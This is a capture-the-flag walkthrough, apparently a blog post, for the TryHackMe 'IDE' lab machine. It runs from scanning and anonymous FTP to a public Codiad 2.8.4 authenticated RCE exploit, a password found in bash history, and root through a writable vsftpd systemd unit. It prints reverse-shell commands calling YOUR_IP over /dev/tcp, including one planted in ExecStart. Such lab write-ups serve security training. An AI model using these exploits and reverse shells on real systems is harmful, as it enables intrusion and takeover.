Link to machine page on TryHackme =>https://tryhackme.com/room/ide
Enumeration
rustscan nmap
└─$rustscan-a 10.10.134.57---A Open 10.10.134.57:21Open 10.10.134.57:22Open 10.10.134.57:80Open 10.10.134.57:62337PORT STATE SERVICE REASON VERSION21/tcp open ftp syn-ack vsftpd 3.0.3|_ftp-anon: Anonymous FTP login allowed(FTP code 230)| ftp-syst: | STAT: | FTP server status:| Connected to ::ffff:YOUR_IP| Loggedinas ftp| TYPE: ASCII| No session bandwidth limit| Sessiontimeoutinseconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 3| vsFTPd 3.0.3 - secure, fast, stable|_End of status22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3(Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28(RSA)| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC94RvPaQ09Xx+jMj32opOMbghuvx4OeBVLc+/4Hascmrtsa+SMtQGSY7b+eyW8Zymxi94rGBIN2ydPxy3XXGtkaCdQluOEw5CqSdb/qyeH+L/1PwIhLrr+jzUoUzmQil+oUOpVMOkcW7a00BMSxMCij0HdhlVDNkWvPdGxKBviBDEKZAH0hJEfexz3Tm65cmBpMe7WCPiJGTvoU9weXUnO3+41Ig8qF7kNNfbHjTgS0+XTnDXk03nZwIIwdvP8dZ8lZHdooM8J9u0Zecu4OvPiC4XBzPYNs+6ntLziKlRMgQls0e3yMOaAuKfGYHJKwu4AcluJ/+g90Hr0UqmYLHEV| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87(ECDSA)| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBzKTu7YDGKubQ4ADeCztKu0LL5RtBXnjgjE07e3Go/GbZB2vAP2J9OEQH/PwlssyImSnS3myib+gPdQx54lqZU=| 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20(ED25519)|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ+oGPm8ZVYNUtX4r3Fpmcj9T9F2SjcRg4ansmeGR3cP80/tcp open http syn-ack Apache httpd 2.4.29((Ubuntu))| http-methods: |_ Supported Methods: OPTIONS HEAD GET POST|_http-server-header: Apache/2.4.29(Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works62337/tcp open http syn-ack Apache httpd 2.4.29((Ubuntu))|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F| http-methods: |_ Supported Methods: GET HEAD POST OPTIONS|_http-server-header: Apache/2.4.29(Ubuntu)|_http-title: Codiad 2.8.4Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelWeb servers are running on both port 80 and 62337.
On port 62337, there seems to be an application running - Codiad 2.8.4.
Searching for it on Google yields this =>https://github.com/Codiad/Codiad. Its a Cloud based IDE, hence the name of the machine I guess.
FTP Server Enum
The server seems to be support anonymous login(from nmap output). Let's see what we can get from it.
└─$ftp ide.thmConnected to ide.thm.220(vsFTPd 3.0.3)Name(ide.thm:kali): Anonymous331 Please specify the password.Password: 230 Login successful.Remote systemtypeis UNIX.Using binary mode to transfer files.ftp>ls229 Entering Extended Passive Mode(|||16569|)150 Here comes the directory listing.226 Directory send OK.ftp>ls-la229 Entering Extended Passive Mode(|||24477|)150 Here comes the directory listing.drwxr-xr-x 3 0 114 4096 Jun 18 2021.drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...226 Directory send OK.ftp>cd ...250 Directory successfully changed.ftp>ls-la229 Entering Extended Passive Mode(|||15019|)150 Here comes the directory listing.-rw-r--r-- 1 0 0 151 Jun 18 2021 -drwxr-xr-x 2 0 0 4096 Jun 18 2021.drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..ftp> get -local: - remote: -229 Entering Extended Passive Mode(|||16831|)150 Opening BINARY mode data connectionfor -(151 bytes).100% |****************************************************************************************************************| 151 150.93 KiB/s 00:00 ETA226 Transfer complete.151 bytes receivedin00:00(0.85 KiB/s)ftp>exit221 Goodbye.After downloading it, let's rename THE- file and see what's inside.
┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_ide]└─$mv - ftp_file └─$catftp_file Hey john,I have reset the password as you have asked. Please use the default password to login. Also, please take care of the image file;)- drac.So there's two possible usernamesjohn anddrac.
Web Server Enum [Port 80]
Let's see if we can find anything interesting here.
root@ip-10-10-0-98:~/ide# ffuf-w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt-u http://ide.thm/FUZZ-o ffuf/raftLarge-of html-ic-r-recursion-c-e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz-sfindex.html[Status: 200, Size: 10918, Words: 3499, Lines: 376]server-status[Status: 403, Size: 272, Words: 20, Lines: 10].php[Status: 403, Size: 272, Words: 20, Lines: 10].html[Status: 403, Size: 272, Words: 20, Lines: 10][Status: 200, Size: 10918, Words: 3499, Lines: 376].html[Status: 403, Size: 272, Words: 20, Lines: 10].php[Status: 403, Size: 272, Words: 20, Lines: 10][Status: 200, Size: 10918, Words: 3499, Lines: 376]index.html[Status: 200, Size: 10918, Words: 3499, Lines: 376]:: Progress:[622750/622750] :: Job[1/1] :: 10508 req/sec :: Duration:[0:01:05] :: Errors: 30 ::root@ip-10-10-0-98:~/ide# ffuf-w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt-u http://ide.thm/FUZZ-o ffuf/big-of html-ic-r-recursion-c-e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz-sf:: Progress:[204730/204730] :: Job[1/1] :: 12140 req/sec :: Duration:[0:00:22] :: Errors: 0 ::root@ip-10-10-0-98:~/ide# ffuf-w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt-u http://ide.thm/FUZZ-o ffuf/dirMedium-of html-ic-r-recursion-c-e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz-sf:: Progress:[2076300/2076300] :: Job[1/1] :: 3482 req/sec :: Duration:[0:06:32] :: Errors: 0 ::Nothing here at all for us it seems. Let's move on.
Web Server Enum [Port 62337]
When we visit the sitehttp://ide.thm:62337, there is a login portal.
admin:admin does not work. Neither doesjohn:admin ordrac:admin.
There are RCE exploits available for Codiad 2.8.4, but they require authentication. We will have to find a way to get the creds.
In the mean time, let's fuzz the portal and see what we can find.
root@ip-10-10-0-98:~/ide# ffuf-w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt-u http://ide.thm:62337/FUZZ-o ffuf/raftLarge-of html-ic-r-recursion-c-e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz-sfjs[Status: 200, Size: 3697, Words: 229, Lines: 30]plugins[Status: 200, Size: 937, Words: 62, Lines: 17]themes[Status: 200, Size: 1131, Words: 75, Lines: 18]components[Status: 200, Size: 3938, Words: 244, Lines: 32]data[Status: 200, Size: 1944, Words: 134, Lines: 22]lib[Status: 200, Size: 1173, Words: 78, Lines: 18]config.php[Status: 200, Size: 0, Words: 1, Lines: 1]common.php[Status: 200, Size: 0, Words: 1, Lines: 1]languages[Status: 200, Size: 4609, Words: 305, Lines: 36]index.php[Status: 200, Size: 5239, Words: 1739, Lines: 87]INSTALL.txt[Status: 200, Size: 634, Words: 93, Lines: 22]workspace[Status: 200, Size: 941, Words: 66, Lines: 17]server-status[Status: 403, Size: 275, Words: 20, Lines: 10].html[Status: 403, Size: 275, Words: 20, Lines: 10].php[Status: 403, Size: 275, Words: 20, Lines: 10][Status: 200, Size: 5239, Words: 1739, Lines: 87]LICENSE.txt[Status: 200, Size: 1133, Words: 191, Lines: 21]style_guide.php[Status: 200, Size: 24394, Words: 7692, Lines: 328].php[Status: 403, Size: 275, Words: 20, Lines: 10][Status: 200, Size: 5239, Words: 1739, Lines: 87].html[Status: 403, Size: 275, Words: 20, Lines: 10]:: Progress:[622750/622750] :: Job[1/1] :: 9664 req/sec :: Duration:[0:02:45] :: Errors: 30 ::Dir listing seems to be enabled. Some examples
Now I go back to the login page and take a guess at the password, since the notes in the FTP server mentioned "default password".
john:CENSORED.
HINT: This is a very commonly used password and I got lucky when I guessed it.
Now let's try and use those exploits to see if we can get some RCE.
└─$searchsploit codiad 2.8.4------------------------------------------------------------------------------------------------------------------------------------------------------------ Exploit Title | Path------------------------------------------------------------------------------------------------------------------------------------------------------------Codiad 2.8.4 - Remote Code Execution(Authenticated) | multiple/webapps/49705.pyCodiad 2.8.4 - Remote Code Execution(Authenticated)(2) | multiple/webapps/49902.pyCodiad 2.8.4 - Remote Code Execution(Authenticated)(3) | multiple/webapps/49907.pyCodiad 2.8.4 - Remote Code Execution(Authenticated)(4) | multiple/webapps/50474.txt-----------------------------------------------------------------------------------------------------------------------------------------------------------Foothold
Let's use this exploit =>https://www.exploit-db.com/exploits/49705
Running the exploit.
└─$python3 49705.py http://10.10.180.194:62337/ john CENSORED YOUR_IP 4444 linux[+] Please execute the followingcommandon your vps:echo'bash -c "bash -i >/dev/tcp/YOUR_IP/4445 0>&1 2>&1"' | nc-lnvp 4444nc-lnvp 4445[+] Please confirm that you havedonethe twocommandabove[y/n][Y/n] Y[+] Starting...[+] Login Content :{"status":"success","data":{"username":"john"}}[+] Login success![+] Getting writeable path...[+] Path Content :{"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}[+] Writeable Path : /var/www/html/codiad_projects[+] Sending payload...------└─$echo'bash -c "bash -i >/dev/tcp/YOUR_IP/4445 0>&1 2>&1"' | nc-lnvp 4444Ncat: Version 7.93( https://nmap.org/ncat)Ncat: Listening on :::4444Ncat: Listening on 0.0.0.0:4444Ncat: Connection from 10.10.180.194.Ncat: Connection from 10.10.180.194:38116.┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_ide]------└─$ncat-lnvp 4445 Ncat: Version 7.93( https://nmap.org/ncat)Ncat: Listening on :::4445Ncat: Listening on 0.0.0.0:4445Ncat: Connection from 10.10.180.194.Ncat: Connection from 10.10.180.194:47536.bash: cannotsetterminal process group(906): Inappropriate ioctlfordevicebash: no job controlinthis shellwww-data@ide:/var/www/html/codiad/components/filemanager$ididuid=33(www-data)gid=33(www-data)groups=33(www-data)www-data@ide:/var/www/html/codiad/components/filemanager$Now, this process of starting a reverse shell is pretty complicated. So instead, I am gonna upload a reverse shell.
Uploaded my own PHP reverse shell usingnc. Remember that dir listing is enabled. So we can access it directly athttp://ide.thm:62337/data/rshell.php
www-data@ide:/var/www/html/codiad/data$ls-ltotal 36-rw-r--r-- 1 www-data www-data 18 Jun 18 2021 README-rw-r--r-- 1 www-data www-data 311 Nov 8 07:48 active.phpdrwxr-xr-x 2 www-data www-data 4096 Nov 8 07:46 cache-rw-r--r-- 1 www-data www-data 82 Jun 18 2021 projects.php-rw-r--r-- 1 www-data www-data 5493 Nov 8 08:11 rshell.php-rw-r--r-- 1 www-data www-data 52 Jun 18 2021 settings.php-rw-r--r-- 1 www-data www-data 138 Nov 8 07:46 users.php-rw-r--r-- 1 www-data www-data 79 Jun 18 2021 version.phpWe cannot readuser.txt in/home/drac. We will need to find a way to pivot to thedrac user.
www-data@ide:/home/drac$ls-ltotal 4-r-------- 1 drac drac 33 Jun 18 2021 user.txtPrivesc
lse run
Runninglse first. Note the very old Linux Kernel.
ser: www-data User ID: 33 Password: none Home: /var/www Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binumask: 0000 Hostname: ide Linux: 4.15.0-147-genericDistribution: Ubuntu 18.04.5 LTSArchitecture: x86_64[*] usr020 Are there otherusersinadministrativegroups?.................yes!---adm:x:4:syslogsudo:x:27:drac---[*] usr030 Otheruserswith shell..........................................yes!---root:x:0:0:root:/root:/bin/bashdrac:x:1000:1000:drac:/home/drac:/bin/bash[*] sud050 Do we knowifany otherusersusedsudo?........................yes!---drac[*] fst100 Useful binaries.................................................yes!---/usr/bin/curl/usr/bin/dig/bin/nc.openbsd/bin/nc/bin/netcat/usr/bin/wget[*] sys050 Can root user loginvia SSH?...................................yes!---PermitRootLoginyes[*] pro020 Processes running with root permissions.........................yes!---START PID USER COMMANDSTART PID USER COMMAND08:24 28942 rootsleep15 08:24 28939 root /bin/sh-cforiin0 1 2 3;dorm-rf /var/www/html/config.php /var/www/html/data &sleep15;done;08:24 28938 root /usr/sbin/CRON-f08:23 5438 rootsleep1508:23 2632 rootsleep1508:23 2630 root /bin/sh-cforiin0 1 2 3;dorm-rf /var/www/html/config.php /var/www/html/data &sleep15;done;[!] cve-2021-4034 CheckingforPwnKit vulnerability........................yes!---Vulnerable! polkit version: 0.105-20ubuntu0.18.04.5That process running asroot, where theconfig.php is being deleted is interesting. The thing is, those filesconfig.php anddata don't exist.
linpeas run
═══════════════════════════════╣ Basic information ╠═══════════════════════════════ OS: Linux version 4.15.0-147-generic(buildd@lcy01-amd64-028)(gcc version 7.5.0(Ubuntu 7.5.0-3ubuntu1~18.04))#151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021User & Groups:uid=33(www-data)gid=33(www-data)groups=33(www-data)Hostname: ideWritable folder: /dev/shm╔══════════╣ CVEs CheckVulnerable to CVE-2021-4034 Potentially Vulnerable to CVE-2022-2588════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 841 0.0 0.3 30028 3180 ? Ss 07:11 0:00 /usr/sbin/cron-froot 2628 0.0 0.3 57500 3200 ? S 08:23 0:00 _ /usr/sbin/CRON-froot 2630 0.0 0.0 4628 808 ? Ss 08:23 0:00 _ /bin/sh-cforiin0 1 2 3;dorm-rf /var/www/html/config.php /var/www/html/data &sleep15;done;╔══════════╣ Superusersroot:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with consoledrac:x:1000:1000:drac:/home/drac:/bin/bash root:x:0:0:root:/root:/bin/bash╔══════════╣ Useful software/usr/bin/base64 /usr/bin/curl/usr/bin/lxc/bin/nc/bin/netcat/usr/bin/perl/usr/bin/php/bin/ping/usr/bin/python3/usr/bin/python3.6/usr/bin/sudo/usr/bin/wget╔══════════╣ Installed Compilers/usr/share/gcc-8 ╔══════════╣ Searching passwordsinhistoryfilesmysql-u drac-p'CENSORED'Well well we hit the jackpot. To confirm this, let's go check the history file ourselves.
www-data@ide:/home/drac$cat .bash_history mysql-u drac-p'CENSORED'Should have checked the history file first saved ourselves some time. Anyway, let's try ssh login with these creds.
Success!!
drac@ide:~$iduid=1000(drac)gid=1000(drac)groups=1000(drac),24(cdrom),27(sudo),30(dip),46(plugdev)No need for the reverse shell any more.
Privesc from drac to root
drac@ide:~$sudo-l[sudo] passwordfordrac: Matching Defaults entriesfordrac on ide: env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser drac may run the following commands on ide:(ALL : ALL) /usr/sbin/service vsftpd restartInteresting. This was confusing to look at first.
But if you have installed software and administered a system before, you would recognize the command.
vsftpd has been configured to run as asystemd service. The usual command to check the service status issystemctl status vsftpd. Any guide to installing and configuringvsftpd should have similar commands. Example ->https://www.howtoforge.com/tutorial/install-and-configure-vsftpd-server-on-ubuntu-1804/
Anyway, let's check the service status
drac@ide:/dev/shm$systemctl status vsftpd● vsftpd.service - vsftpd FTP server Loaded: loaded(/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled) Active: active(running) since Tue 2022-11-08 09:28:50 UTC; 27min ago Process: 1278ExecStartPre=/bin/mkdir-p /var/run/vsftpd/empty(code=exited,status=0/SUCCESS) Main PID: 1289(vsftpd) Tasks: 1(limit: 1103) CGroup: /system.slice/vsftpd.service └─1289 /usr/sbin/vsftpd /etc/vsftpd.confYou can not only check thestatus but also stop, start and restart the service, with the right permissions.
The file of interest to us here is/lib/systemd/system/vsftpd.service. Contents of said file as follows:
[Unit]Description=vsftpd FTP serverAfter=network.target[Service]Type=simpleExecStart=/usr/sbin/vsftpd /etc/vsftpd.confExecReload=/bin/kill -HUP $MAINPIDExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty[Install]WantedBy=multi-user.targetLet's see if we have permissions to modify this file
drac@ide:/dev/shm$ls-l /lib/systemd/system/-rw-rw-r-- 1 root drac 248 Aug 4 2021 vsftpd.serviceYes we do :)
Let's modify theExecStart attribute in the config file, to create a TCP reverse shell to send us a connection whenever the service is restarted.
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/YOUR_IP/443 0>&1 ; /usr/sbin/vsftpd /etc/vsftpd.conf"You will need to runsystemctl daemon-reload after modifying the file to reload the config. Source:https://www.shellhacks.com/systemd-service-file-example/
drac@ide:/dev/shm$cp /lib/systemd/system/vsftpd.service vsftpd.service.bakdrac@ide:/dev/shm$vim /lib/systemd/system/vsftpd.service drac@ide:/dev/shm$systemctl daemon-reload==== AUTHENTICATING FOR org.freedesktop.systemd1.reload-daemon===Authentication is required to reload the systemd state. Authenticating as: dracPassword:==== AUTHENTICATION COMPLETE===drac@ide:/dev/shm$systemctl status vsftpd.service ● vsftpd.service - vsftpd FTP server Loaded: loaded(/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled) Active: active(running) since Tue 2022-11-08 10:09:52 UTC; 8min ago Main PID: 30361(vsftpd) Tasks: 1(limit: 1103) CGroup: /system.slice/vsftpd.service └─30361 /usr/sbin/vsftpd /etc/vsftpd.confIts good to check the service status again, to ensure that our modification of thevsftpd.service file did not result in any errors. Otherwise we would see a "Loaded: error"
NOTE: Initially I did not add the/bin/bash -c part to theExecStart string. Its only after getting errors and asking for a hint on the THM Discord that I figured out that it had to be done this way.
Now, the moment of truth.
drac@ide:/dev/shm$sudo /usr/sbin/service vsftpd restart---└─$ncat-lnvp 443 Ncat: Version 7.93( https://nmap.org/ncat)Ncat: Listening on :::443Ncat: Listening on 0.0.0.0:443Ncat: Connection from 10.10.180.194.Ncat: Connection from 10.10.180.194:56246.bash: cannotsetterminal process group(31614): Inappropriate ioctlfordevicebash: no job controlinthis shellroot@ide:/#ididuid=0(root)gid=0(root)groups=0(root)root@ide:/#DONE!! Have a great day!!
Top comments(0)
For further actions, you may consider blocking this person and/orreporting abuse
